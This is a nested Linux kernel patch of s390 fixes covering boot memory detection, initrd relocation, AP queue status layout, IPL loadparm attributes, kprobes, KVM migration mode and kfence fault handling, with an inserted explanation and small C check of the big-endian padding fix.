+-#include <linux/stddef.h>
+-
+ #ifdef CONFIG_KERNEL_UNCOMPRESSED
+ static inline void *decompress_kernel(void) { return NULL; }
+ #else
+ void *decompress_kernel(void);
+ #endif
+ unsigned long mem_safe_offset(void);
+-void error(char *m);
+-
+-struct vmlinux_info {
+-	unsigned long default_lma;
+-	void (*entry)(void);
+-	unsigned long image_size;	/* does not include .bss */
+-	unsigned long bss_size;		/* uncompressed image .bss size */
+-	unsigned long bootdata_off;
+-	unsigned long bootdata_size;
+-	unsigned long bootdata_preserved_off;
+-	unsigned long bootdata_preserved_size;
+-	unsigned long dynsym_start;
+-	unsigned long rela_dyn_start;
+-	unsigned long rela_dyn_end;
+-	unsigned long amode31_size;
+-};
+-
+-/* Symbols defined by linker scripts */
+-extern char _end[];
+-extern unsigned char _compressed_start[];
+-extern unsigned char _compressed_end[];
+-extern char _vmlinux_info[];
+-
+-#define vmlinux (*(struct vmlinux_info *)_vmlinux_info)
+ 
+ #endif /* BOOT_COMPRESSED_DECOMPRESSOR_H */
+diff --git a/arch/s390/boot/kaslr.c b/arch/s390/boot/kaslr.c
+index e8d74d4f62aa5..58a8d8c8a1007 100644
+--- a/arch/s390/boot/kaslr.c
++++ b/arch/s390/boot/kaslr.c
+@@ -174,7 +174,6 @@ unsigned long get_random_base(unsigned long safe_addr)
+ {
+ 	unsigned long memory_limit = get_mem_detect_end();
+ 	unsigned long base_pos, max_pos, kernel_size;
+-	unsigned long kasan_needs;
+ 	int i;
+ 
+ 	memory_limit = min(memory_limit, ident_map_size);
+@@ -186,12 +185,7 @@ unsigned long get_random_base(unsigned long safe_addr)
+ 	 */
+ 	memory_limit -= kasan_estimate_memory_needs(memory_limit);
+ 
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size) {
+-		if (safe_addr < initrd_data.start + initrd_data.size)
+-			safe_addr = initrd_data.start + initrd_data.size;
+-	}
+ 	safe_addr = ALIGN(safe_addr, THREAD_SIZE);
+-
+ 	kernel_size = vmlinux.image_size + vmlinux.bss_size;
+ 	if (safe_addr + kernel_size > memory_limit)
+ 		return 0;
+diff --git a/arch/s390/boot/mem_detect.c b/arch/s390/boot/mem_detect.c
+index 7fa1a32ea0f3f..daa1593171835 100644
+--- a/arch/s390/boot/mem_detect.c
++++ b/arch/s390/boot/mem_detect.c
+@@ -16,29 +16,10 @@ struct mem_detect_info __bootdata(mem_detect);
+ #define ENTRIES_EXTENDED_MAX						       \
+ 	(256 * (1020 / 2) * sizeof(struct mem_detect_block))
+ 
+-/*
+- * To avoid corrupting old kernel memory during dump, find lowest memory
+- * chunk possible either right after the kernel end (decompressed kernel) or
+- * after initrd (if it is present and there is no hole between the kernel end
+- * and initrd)
+- */
+-static void *mem_detect_alloc_extended(void)
+-{
+-	unsigned long offset = ALIGN(mem_safe_offset(), sizeof(u64));
+-
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+-	    initrd_data.start < offset + ENTRIES_EXTENDED_MAX)
+-		offset = ALIGN(initrd_data.start + initrd_data.size, sizeof(u64));
+-
+-	return (void *)offset;
+-}
+-
+ static struct mem_detect_block *__get_mem_detect_block_ptr(u32 n)
+ {
+ 	if (n < MEM_INLINED_ENTRIES)
+ 		return &mem_detect.entries[n];
+-	if (unlikely(!mem_detect.entries_extended))
+-		mem_detect.entries_extended = mem_detect_alloc_extended();
+ 	return &mem_detect.entries_extended[n - MEM_INLINED_ENTRIES];
+ }
+ 
+@@ -147,7 +128,7 @@ static int tprot(unsigned long addr)
+ 	return rc;
+ }
+ 
+-static void search_mem_end(void)
++static unsigned long search_mem_end(void)
+ {
+ 	unsigned long range = 1 << (MAX_PHYSMEM_BITS - 20); /* in 1MB blocks */
+ 	unsigned long offset = 0;
+@@ -159,33 +140,34 @@ static void search_mem_end(void)
+ 		if (!tprot(pivot << 20))
+ 			offset = pivot;
+ 	}
+-
+-	add_mem_detect_block(0, (offset + 1) << 20);
++	return (offset + 1) << 20;
+ }
+ 
+-unsigned long detect_memory(void)
++unsigned long detect_memory(unsigned long *safe_addr)
+ {
+-	unsigned long max_physmem_end;
++	unsigned long max_physmem_end = 0;
+ 
+ 	sclp_early_get_memsize(&max_physmem_end);
++	mem_detect.entries_extended = (struct mem_detect_block *)ALIGN(*safe_addr, sizeof(u64));
+ 
+ 	if (!sclp_early_read_storage_info()) {
+ 		mem_detect.info_source = MEM_DETECT_SCLP_STOR_INFO;
+-		return max_physmem_end;
+-	}
+-
+-	if (!diag260()) {
++	} else if (!diag260()) {
+ 		mem_detect.info_source = MEM_DETECT_DIAG260;
+-		return max_physmem_end;
+-	}
+-
+-	if (max_physmem_end) {
++		max_physmem_end = max_physmem_end ?: get_mem_detect_end();
++	} else if (max_physmem_end) {
+ 		add_mem_detect_block(0, max_physmem_end);
+ 		mem_detect.info_source = MEM_DETECT_SCLP_READ_INFO;
+-		return max_physmem_end;
++	} else {
++		max_physmem_end = search_mem_end();
++		add_mem_detect_block(0, max_physmem_end);
++		mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
++	}
++
++	if (mem_detect.count > MEM_INLINED_ENTRIES) {
++		*safe_addr += (mem_detect.count - MEM_INLINED_ENTRIES) *
++			     sizeof(struct mem_detect_block);
+ 	}
+ 
+-	search_mem_end();
+-	mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
+-	return get_mem_detect_end();
++	return max_physmem_end;
+ }
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index 47ca3264c0230..e0863d28759a5 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -57,16 +57,17 @@ unsigned long mem_safe_offset(void)
+ }
+ #endif
+ 
+-static void rescue_initrd(unsigned long addr)
++static unsigned long rescue_initrd(unsigned long safe_addr)
+ {
+ 	if (!IS_ENABLED(CONFIG_BLK_DEV_INITRD))
+-		return;
++		return safe_addr;
+ 	if (!initrd_data.start || !initrd_data.size)
+-		return;
+-	if (addr <= initrd_data.start)
+-		return;
+-	memmove((void *)addr, (void *)initrd_data.start, initrd_data.size);
+-	initrd_data.start = addr;
++		return safe_addr;
++	if (initrd_data.start < safe_addr) {
++		memmove((void *)safe_addr, (void *)initrd_data.start, initrd_data.size);
++		initrd_data.start = safe_addr;
++	}
++	return initrd_data.start + initrd_data.size;
+ }
+ 
+ static void copy_bootdata(void)
+@@ -250,6 +251,7 @@ static unsigned long reserve_amode31(unsigned long safe_addr)
+ 
+ void startup_kernel(void)
+ {
++	unsigned long max_physmem_end;
+ 	unsigned long random_lma;
+ 	unsigned long safe_addr;
+ 	void *img;
+@@ -265,12 +267,13 @@ void startup_kernel(void)
+ 	safe_addr = reserve_amode31(safe_addr);
+ 	safe_addr = read_ipl_report(safe_addr);
+ 	uv_query_info();
+-	rescue_initrd(safe_addr);
++	safe_addr = rescue_initrd(safe_addr);
+ 	sclp_early_read_info();
+ 	setup_boot_command_line();
+ 	parse_boot_command_line();
+ 	sanitize_prot_virt_host();
+-	setup_ident_map_size(detect_memory());
++	max_physmem_end = detect_memory(&safe_addr);
++	setup_ident_map_size(max_physmem_end);
+ 	setup_vmalloc_size();
+ 	setup_kernel_memory_layout();
+ 
+diff --git a/arch/s390/include/asm/ap.h b/arch/s390/include/asm/ap.h
+index f508f5025e388..57a2d6518d272 100644
+--- a/arch/s390/include/asm/ap.h
++++ b/arch/s390/include/asm/ap.h
+@@ -239,7 +239,10 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 	union {
+ 		unsigned long value;
+ 		struct ap_qirq_ctrl qirqctrl;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2 = pa_ind;
+ 
+@@ -253,7 +256,7 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 		"	lgr	%[reg1],1\n"		/* gr1 (status) into reg1 */
+ 		: [reg1] "+&d" (reg1)
+ 		: [reg0] "d" (reg0), [reg2] "d" (reg2)
+-		: "cc", "0", "1", "2");
++		: "cc", "memory", "0", "1", "2");
+ 
+ 	return reg1.status;
+ }
+@@ -290,7 +293,10 @@ static inline struct ap_queue_status ap_qact(ap_qid_t qid, int ifbit,
+ 	unsigned long reg0 = qid | (5UL << 24) | ((ifbit & 0x01) << 22);
+ 	union {
+ 		unsigned long value;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2;
+ 
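
Both ap.h hunks fix the same layout bug: s390 is big-endian, so a bare 32-bit struct ap_queue_status overlaying a 64-bit register image lands in bits 0-31 (the high half), while the instruction returns the status in bits 32-63; the explicit pad moves the struct to where the hardware writes. (The added "memory" clobber is a separate fix, stopping the compiler from caching memory across the inline asm.) A host-side layout check:

  #include <stddef.h>
  #include <stdint.h>
  #include <stdio.h>

  struct status { uint32_t bits; };   /* stand-in for ap_queue_status */

  union reg1 {
          uint64_t value;
          struct {
                  uint32_t pad;           /* bits 0-31 on big-endian  */
                  struct status status;   /* bits 32-63, the low half */
          };
  };

  int main(void)
  {
          /* Prints 4: with the pad, status overlays the second word,
           * which on a big-endian machine is the low 32 bits. */
          printf("%zu\n", offsetof(union reg1, status));
          return 0;
  }
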
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 6030fdd6997bc..9693c8630e73f 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -288,7 +288,6 @@ static void __init sort_amode31_extable(void)
+ 
+ void __init startup_init(void)
+ {
+-	sclp_early_adjust_va();
+ 	reset_tod_clock();
+ 	check_image_bootable();
+ 	time_early_init();
+diff --git a/arch/s390/kernel/head64.S b/arch/s390/kernel/head64.S
+index d7b8b6ad574dc..3b3bf8329e6c1 100644
+--- a/arch/s390/kernel/head64.S
++++ b/arch/s390/kernel/head64.S
+@@ -25,6 +25,7 @@ ENTRY(startup_continue)
+ 	larl	%r14,init_task
+ 	stg	%r14,__LC_CURRENT
+ 	larl	%r15,init_thread_union+THREAD_SIZE-STACK_FRAME_OVERHEAD-__PT_SIZE
++	brasl	%r14,sclp_early_adjust_va	# allow sclp_early_printk
+ #ifdef CONFIG_KASAN
+ 	brasl	%r14,kasan_early_init
+ #endif
+diff --git a/arch/s390/kernel/idle.c b/arch/s390/kernel/idle.c
+index 4bf1ee293f2b3..a0da049e73609 100644
+--- a/arch/s390/kernel/idle.c
++++ b/arch/s390/kernel/idle.c
+@@ -44,7 +44,7 @@ void account_idle_time_irq(void)
+ 	S390_lowcore.last_update_timer = idle->timer_idle_exit;
+ }
+ 
+-void arch_cpu_idle(void)
++void noinstr arch_cpu_idle(void)
+ {
+ 	struct s390_idle_data *idle = this_cpu_ptr(&s390_idle);
+ 	unsigned long idle_time;
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index fbd646dbf4402..bcf03939e6fe8 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -593,6 +593,7 @@ static struct attribute *ipl_eckd_attrs[] = {
+ 	&sys_ipl_type_attr.attr,
+ 	&sys_ipl_eckd_bootprog_attr.attr,
+ 	&sys_ipl_eckd_br_chr_attr.attr,
++	&sys_ipl_ccw_loadparm_attr.attr,
+ 	&sys_ipl_device_attr.attr,
+ 	&sys_ipl_secure_attr.attr,
+ 	&sys_ipl_has_secure_attr.attr,
+@@ -888,23 +889,27 @@ static ssize_t reipl_generic_loadparm_store(struct ipl_parameter_block *ipb,
+ 	return len;
+ }
+ 
+-/* FCP wrapper */
+-static ssize_t reipl_fcp_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_fcp, page);
+-}
+-
+-static ssize_t reipl_fcp_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_fcp, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_fcp_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_fcp_loadparm_show,
+-	       reipl_fcp_loadparm_store);
++#define DEFINE_GENERIC_LOADPARM(name)							\
++static ssize_t reipl_##name##_loadparm_show(struct kobject *kobj,			\
++					    struct kobj_attribute *attr, char *page)	\
++{											\
++	return reipl_generic_loadparm_show(reipl_block_##name, page);			\
++}											\
++static ssize_t reipl_##name##_loadparm_store(struct kobject *kobj,			\
++					     struct kobj_attribute *attr,		\
++					     const char *buf, size_t len)		\
++{											\
++	return reipl_generic_loadparm_store(reipl_block_##name, buf, len);		\
++}											\
++static struct kobj_attribute sys_reipl_##name##_loadparm_attr =				\
++	__ATTR(loadparm, 0644, reipl_##name##_loadparm_show,				\
++	       reipl_##name##_loadparm_store)
++
++DEFINE_GENERIC_LOADPARM(fcp);
++DEFINE_GENERIC_LOADPARM(nvme);
++DEFINE_GENERIC_LOADPARM(ccw);
++DEFINE_GENERIC_LOADPARM(nss);
++DEFINE_GENERIC_LOADPARM(eckd);
+ 
+ static ssize_t reipl_fcp_clear_show(struct kobject *kobj,
+ 				    struct kobj_attribute *attr, char *page)
+@@ -994,24 +999,6 @@ DEFINE_IPL_ATTR_RW(reipl_nvme, bootprog, "%lld\n", "%lld\n",
+ DEFINE_IPL_ATTR_RW(reipl_nvme, br_lba, "%lld\n", "%lld\n",
+ 		   reipl_block_nvme->nvme.br_lba);
+ 
+-/* nvme wrapper */
+-static ssize_t reipl_nvme_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_nvme, page);
+-}
+-
+-static ssize_t reipl_nvme_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_nvme, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_nvme_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_nvme_loadparm_show,
+-	       reipl_nvme_loadparm_store);
+-
+ static struct attribute *reipl_nvme_attrs[] = {
+ 	&sys_reipl_nvme_fid_attr.attr,
+ 	&sys_reipl_nvme_nsid_attr.attr,
+@@ -1047,38 +1034,6 @@ static struct kobj_attribute sys_reipl_nvme_clear_attr =
+ /* CCW reipl device attributes */
+ DEFINE_IPL_CCW_ATTR_RW(reipl_ccw, device, reipl_block_ccw->ccw);
+ 
+-/* NSS wrapper */
+-static ssize_t reipl_nss_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_nss, page);
+-}
+-
+-static ssize_t reipl_nss_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_nss, buf, len);
+-}
+-
+-/* CCW wrapper */
+-static ssize_t reipl_ccw_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_ccw, page);
+-}
+-
+-static ssize_t reipl_ccw_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_ccw, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_ccw_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_ccw_loadparm_show,
+-	       reipl_ccw_loadparm_store);
+-
+ static ssize_t reipl_ccw_clear_show(struct kobject *kobj,
+ 				    struct kobj_attribute *attr, char *page)
+ {
+@@ -1176,6 +1131,7 @@ static struct attribute *reipl_eckd_attrs[] = {
+ 	&sys_reipl_eckd_device_attr.attr,
+ 	&sys_reipl_eckd_bootprog_attr.attr,
+ 	&sys_reipl_eckd_br_chr_attr.attr,
++	&sys_reipl_eckd_loadparm_attr.attr,
+ 	NULL,
+ };
+ 
+@@ -1251,10 +1207,6 @@ static struct kobj_attribute sys_reipl_nss_name_attr =
+ 	__ATTR(name, 0644, reipl_nss_name_show,
+ 	       reipl_nss_name_store);
+ 
+-static struct kobj_attribute sys_reipl_nss_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_nss_loadparm_show,
+-	       reipl_nss_loadparm_store);
+-
+ static struct attribute *reipl_nss_attrs[] = {
+ 	&sys_reipl_nss_name_attr.attr,
+ 	&sys_reipl_nss_loadparm_attr.attr,
+diff --git a/arch/s390/kernel/kprobes.c b/arch/s390/kernel/kprobes.c
+index 401f9c933ff94..5ca02680fc3c6 100644
+--- a/arch/s390/kernel/kprobes.c
++++ b/arch/s390/kernel/kprobes.c
+@@ -278,6 +278,7 @@ static void pop_kprobe(struct kprobe_ctlblk *kcb)
+ {
+ 	__this_cpu_write(current_kprobe, kcb->prev_kprobe.kp);
+ 	kcb->kprobe_status = kcb->prev_kprobe.status;
++	kcb->prev_kprobe.kp = NULL;
+ }
+ NOKPROBE_SYMBOL(pop_kprobe);
+ 
+@@ -432,12 +433,11 @@ static int post_kprobe_handler(struct pt_regs *regs)
+ 	if (!p)
+ 		return 0;
+ 
++	resume_execution(p, regs);
+ 	if (kcb->kprobe_status != KPROBE_REENTER && p->post_handler) {
+ 		kcb->kprobe_status = KPROBE_HIT_SSDONE;
+ 		p->post_handler(p, regs, 0);
+ 	}
+-
+-	resume_execution(p, regs);
+ 	pop_kprobe(kcb);
+ 	preempt_enable_no_resched();
+ 
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 9e2b95a222a98..1605ba45ac4c0 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,7 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+ ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index cbf9c1b0beda4..729d4f949cfe8 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -228,5 +228,6 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(.eh_frame)
++		*(.interp)
+ 	}
+ }
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index e4890e04b2108..cb72f9a09fb36 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -5633,23 +5633,40 @@ int kvm_arch_prepare_memory_region(struct kvm *kvm,
+ 	if (kvm_s390_pv_get_handle(kvm))
+ 		return -EINVAL;
+ 
+-	if (change == KVM_MR_DELETE || change == KVM_MR_FLAGS_ONLY)
+-		return 0;
++	if (change != KVM_MR_DELETE && change != KVM_MR_FLAGS_ONLY) {
++		/*
++		 * A few sanity checks. We can have memory slots which have to be
++		 * located/ended at a segment boundary (1MB). The memory in userland is
++		 * ok to be fragmented into various different vmas. It is okay to mmap()
++		 * and munmap() stuff in this slot after doing this call at any time
++		 */
+ 
+-	/* A few sanity checks. We can have memory slots which have to be
+-	   located/ended at a segment boundary (1MB). The memory in userland is
+-	   ok to be fragmented into various different vmas. It is okay to mmap()
+-	   and munmap() stuff in this slot after doing this call at any time */
++		if (new->userspace_addr & 0xffffful)
++			return -EINVAL;
+ 
+-	if (new->userspace_addr & 0xffffful)
+-		return -EINVAL;
++		size = new->npages * PAGE_SIZE;
++		if (size & 0xffffful)
++			return -EINVAL;
+ 
+-	size = new->npages * PAGE_SIZE;
+-	if (size & 0xffffful)
+-		return -EINVAL;
++		if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
++			return -EINVAL;
++	}
+ 
+-	if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
+-		return -EINVAL;
++	if (!kvm->arch.migration_mode)
++		return 0;
++
++	/*
++	 * Turn off migration mode when:
++	 * - userspace creates a new memslot with dirty logging off,
++	 * - userspace modifies an existing memslot (MOVE or FLAGS_ONLY) and
++	 *   dirty logging is turned off.
++	 * Migration mode expects dirty page logging being enabled to store
++	 * its dirty bitmap.
++	 */
++	if (change != KVM_MR_DELETE &&
++	    !(new->flags & KVM_MEM_LOG_DIRTY_PAGES))
++		WARN(kvm_s390_vm_stop_migration(kvm),
++		     "Failed to stop migration mode");
+ 
+ 	return 0;
+ }
+diff --git a/arch/s390/mm/dump_pagetables.c b/arch/s390/mm/dump_pagetables.c
+index 9953819d79596..ba5f802688781 100644
+--- a/arch/s390/mm/dump_pagetables.c
++++ b/arch/s390/mm/dump_pagetables.c
+@@ -33,10 +33,6 @@ enum address_markers_idx {
+ #endif
+ 	IDENTITY_AFTER_NR,
+ 	IDENTITY_AFTER_END_NR,
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	VMEMMAP_NR,
+ 	VMEMMAP_END_NR,
+ 	VMALLOC_NR,
+@@ -47,6 +43,10 @@ enum address_markers_idx {
+ 	ABS_LOWCORE_END_NR,
+ 	MEMCPY_REAL_NR,
+ 	MEMCPY_REAL_END_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ };
+ 
+ static struct addr_marker address_markers[] = {
+@@ -62,10 +62,6 @@ static struct addr_marker address_markers[] = {
+ #endif
+ 	[IDENTITY_AFTER_NR]	= {(unsigned long)_end, "Identity Mapping Start"},
+ 	[IDENTITY_AFTER_END_NR]	= {0, "Identity Mapping End"},
+-#ifdef CONFIG_KASAN
+-	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
+-	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
+-#endif
+ 	[VMEMMAP_NR]		= {0, "vmemmap Area Start"},
+ 	[VMEMMAP_END_NR]	= {0, "vmemmap Area End"},
+ 	[VMALLOC_NR]		= {0, "vmalloc Area Start"},
+@@ -76,6 +72,10 @@ static struct addr_marker address_markers[] = {
+ 	[ABS_LOWCORE_END_NR]	= {0, "Lowcore Area End"},
+ 	[MEMCPY_REAL_NR]	= {0, "Real Memory Copy Area Start"},
+ 	[MEMCPY_REAL_END_NR]	= {0, "Real Memory Copy Area End"},
++#ifdef CONFIG_KASAN
++	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
++	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
++#endif
+ 	{ -1, NULL }
+ };
+ 
+diff --git a/arch/s390/mm/extmem.c b/arch/s390/mm/extmem.c
+index 5060956b8e7d6..1bc42ce265990 100644
+--- a/arch/s390/mm/extmem.c
++++ b/arch/s390/mm/extmem.c
+@@ -289,15 +289,17 @@ segment_overlaps_others (struct dcss_segment *seg)
+ 
+ /*
+  * real segment loading function, called from segment_load
++ * Must return either an error code < 0, or the segment type code >= 0
+  */
+ static int
+ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long *end)
+ {
+ 	unsigned long start_addr, end_addr, dummy;
+ 	struct dcss_segment *seg;
+-	int rc, diag_cc;
++	int rc, diag_cc, segtype;
+ 
+ 	start_addr = end_addr = 0;
++	segtype = -1;
+ 	seg = kmalloc(sizeof(*seg), GFP_KERNEL | GFP_DMA);
+ 	if (seg == NULL) {
+ 		rc = -ENOMEM;
+@@ -326,9 +328,9 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+ 	seg->res_name[8] = '\0';
+ 	strlcat(seg->res_name, " (DCSS)", sizeof(seg->res_name));
+ 	seg->res->name = seg->res_name;
+-	rc = seg->vm_segtype;
+-	if (rc == SEG_TYPE_SC ||
+-	    ((rc == SEG_TYPE_SR || rc == SEG_TYPE_ER) && !do_nonshared))
++	segtype = seg->vm_segtype;
++	if (segtype == SEG_TYPE_SC ||
++	    ((segtype == SEG_TYPE_SR || segtype == SEG_TYPE_ER) && !do_nonshared))
+ 		seg->res->flags |= IORESOURCE_READONLY;
+ 
+ 	/* Check for overlapping resources before adding the mapping. */
+@@ -386,7 +388,7 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+  out_free:
+ 	kfree(seg);
+  out:
+-	return rc;
++	return rc < 0 ? rc : segtype;
+ }
+ 
+ /*
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 9649d9382e0ae..8e84ed2bb944e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -96,6 +96,20 @@ static enum fault_type get_fault_type(struct pt_regs *regs)
+ 	return KERNEL_FAULT;
+ }
+ 
++static unsigned long get_fault_address(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return trans_exc_code & __FAIL_ADDR_MASK;
++}
++
++static bool fault_is_write(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return (trans_exc_code & store_indication) == 0x400;
++}
++
+ static int bad_address(void *p)
+ {
+ 	unsigned long dummy;
+@@ -228,15 +242,26 @@ static noinline void do_sigsegv(struct pt_regs *regs, int si_code)
+ 			(void __user *)(regs->int_parm_long & __FAIL_ADDR_MASK));
+ }
+ 
+-static noinline void do_no_context(struct pt_regs *regs)
++static noinline void do_no_context(struct pt_regs *regs, vm_fault_t fault)
+ {
++	enum fault_type fault_type;
++	unsigned long address;
++	bool is_write;
++
+ 	if (fixup_exception(regs))
+ 		return;
++	fault_type = get_fault_type(regs);
++	if ((fault_type == KERNEL_FAULT) && (fault == VM_FAULT_BADCONTEXT)) {
++		address = get_fault_address(regs);
++		is_write = fault_is_write(regs);
++		if (kfence_handle_page_fault(address, is_write, regs))
++			return;
++	}
+ 	/*
+ 	 * Oops. The kernel tried to access some bad page. We'll have to
+ 	 * terminate things with extreme prejudice.
+ 	 */
+-	if (get_fault_type(regs) == KERNEL_FAULT)
++	if (fault_type == KERNEL_FAULT)
+ 		printk(KERN_ALERT "Unable to handle kernel pointer dereference"
+ 		       " in virtual kernel address space\n");
+ 	else
+@@ -255,7 +280,7 @@ static noinline void do_low_address(struct pt_regs *regs)
+ 		die (regs, "Low-address protection");
+ 	}
+ 
+-	do_no_context(regs);
++	do_no_context(regs, VM_FAULT_BADACCESS);
+ }
+ 
+ static noinline void do_sigbus(struct pt_regs *regs)
+@@ -286,28 +311,28 @@ static noinline void do_fault_error(struct pt_regs *regs, vm_fault_t fault)
+ 		fallthrough;
+ 	case VM_FAULT_BADCONTEXT:
+ 	case VM_FAULT_PFAULT:
+-		do_no_context(regs);
++		do_no_context(regs, fault);
+ 		break;
+ 	case VM_FAULT_SIGNAL:
+ 		if (!user_mode(regs))
+-			do_no_context(regs);
++			do_no_context(regs, fault);
+ 		break;
+ 	default: /* fault & VM_FAULT_ERROR */
+ 		if (fault & VM_FAULT_OOM) {
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				pagefault_out_of_memory();
+ 		} else if (fault & VM_FAULT_SIGSEGV) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigsegv(regs, SEGV_MAPERR);
+ 		} else if (fault & VM_FAULT_SIGBUS) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigbus(regs);
+ 		} else
+@@ -334,7 +359,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	enum fault_type type;
+-	unsigned long trans_exc_code;
+ 	unsigned long address;
+ 	unsigned int flags;
+ 	vm_fault_t fault;
+@@ -351,9 +375,8 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 		return 0;
+ 
+ 	mm = tsk->mm;
+-	trans_exc_code = regs->int_parm_long;
+-	address = trans_exc_code & __FAIL_ADDR_MASK;
+-	is_write = (trans_exc_code & store_indication) == 0x400;
++	address = get_fault_address(regs);
++	is_write = fault_is_write(regs);
+ 
+ 	/*
+ 	 * Verify that the fault happened in user space, that
+@@ -364,8 +387,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	type = get_fault_type(regs);
+ 	switch (type) {
+ 	case KERNEL_FAULT:
+-		if (kfence_handle_page_fault(address, is_write, regs))
+-			return 0;
+ 		goto out;
+ 	case USER_FAULT:
+ 	case GMAP_FAULT:
+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index ee1a97078527b..9a0ce5315f36d 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -297,7 +297,7 @@ static void try_free_pmd_table(pud_t *pud, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
